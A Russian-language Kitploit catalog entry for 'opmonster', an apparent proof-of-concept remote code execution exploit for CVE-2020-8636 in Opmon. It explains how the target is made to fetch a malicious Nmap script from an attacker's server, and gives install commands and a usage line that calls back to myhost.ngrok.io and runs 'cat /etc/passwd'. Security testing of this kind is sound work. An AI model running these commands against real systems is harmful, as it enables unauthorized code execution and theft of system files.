Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
opmonster — CVE-2020-8636 эксплойт аутентифицированного удаленного выполнения кода для Opmon | Kitploit
Инструменты/GitHubGitHub/phor3nsic/opmonster
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubphor3nsic/opmonster

opmonster

CVE-2020-8636 эксплойт аутентифицированного удаленного выполнения кода для Opmon

Репозиторий
21 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

OpMonster

CVE-2020-8636 — эксплойт аутентифицированного удалённого выполнения кода для Opmon

О проекте • Установка • Использование • Лицензия

language last commit license stars

OpMonster

О проекте

OpMonster — это proof-of-concept эксплойт для CVE-2020-8636, уязвимости удалённого выполнения кода в платформе мониторинга Opmon. Он злоупотребляет конечной точкой nettools.php, которая позволяет запускать Nmap с произвольными параметрами --script. Эксплойт заставляет Opmon загрузить вредоносный .nse-скрипт Nmap с сервера, которым вы управляете (через http-fetch), помещает его в /tmp, а затем запускает для выполнения вашей команды на целевой системе и выводит результат.

Обнаружено и разработано @phor3nsic. Подробнее: Three CVEs on Opmon.

Установка

root@kitploit:~
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests

Использование

Сначала запустите веб-сервер на хосте, доступном для целевой системы, в каталоге, откуда можно загрузить сгенерированный .nse-скрипт (эксплойт записывает скрипт в текущий каталог):

root@kitploit:~
php -S 0.0.0.0:1337

Затем запустите эксплойт с четырьмя позиционными аргументами:

root@kitploit:~
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"

Эксплойт завершается с сообщением, если целевая система не загружает скрипт ("not vulnerable") или не может установить исходящее соединение с вашим сервером.

Отказ от ответственности

Только для авторизованного тестирования безопасности и образовательных целей. Вы несёте ответственность за то, как используете этот инструмент.

Лицензия

MIT © phor3nsic

Скачать инструмент
АргументОписание
HOSTБазовый URL целевого Opmon (например, https://vulnhost.com)
LHOSTХост вашего сервера, который раздаёт .nse-скрипт
LPORTПорт вашего сервера
CMDКоманда для выполнения на целевой системе